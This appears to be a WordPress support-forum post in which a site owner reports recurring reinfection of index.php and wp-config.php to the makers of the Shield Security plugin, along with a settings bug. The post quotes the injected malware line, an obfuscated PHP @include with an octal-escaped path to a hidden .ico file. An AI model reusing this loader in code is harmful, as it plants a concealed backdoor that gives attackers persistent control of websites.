2 important issues found
-
Hi.
I’ve been testing your Shield Security for 2 days and it’s a good security tool, however, I found a couple of issues which I wanted to let you know.I must say my site was previously attacked last week and now that it has been restored is still being constantly attacked (by what I see with your plugin).
I don’t know how, but the bot attacker still gets access to my core files and modify them. “index.php” is modified every 12 hours more or less and some encrypted code is added to the header. Once that happens, 2 additional .txt files are also generated by the modified index.php file. If I delete the 2 txt files, they’re automatically re-generated again with a different name. Unless I edit the index.php file and delete the added code, this keeps on happening over and over.
Your plugin does detect these 3 files, however it does not prevent it from happening over and over again every X hours.Apart from that, I also noticed that my “wp-config.php” file had also been infected, but your plugin did not detect it, and that is and important issue.
Here’s the code which was attached to my file (and that I manually deleted):
<?php
/*849b0*/@include “\057va\162/w\167w/\166ho\163ts\057gr\163.c\141t/\150tt\160do\143s/\060OL\104_S\111TE\057Bl\141de\137fl\141sk\137ar\143hi\166os\057.1\0662e\070ba\065.i\143o”;
/*849b0*/
/**Another issue with your current version 7.1.2 is that in my WordPress 4.7.12, WP File Editing is enabled although I set it to disabled in your options. In order to get it eventually disabled, I had to add this “define( ‘DISALLOW_FILE_EDIT’, true );” to my wp-config.php file.
I’ll wait for your comments,
Thank you
- The topic ‘2 important issues found’ is closed to new replies.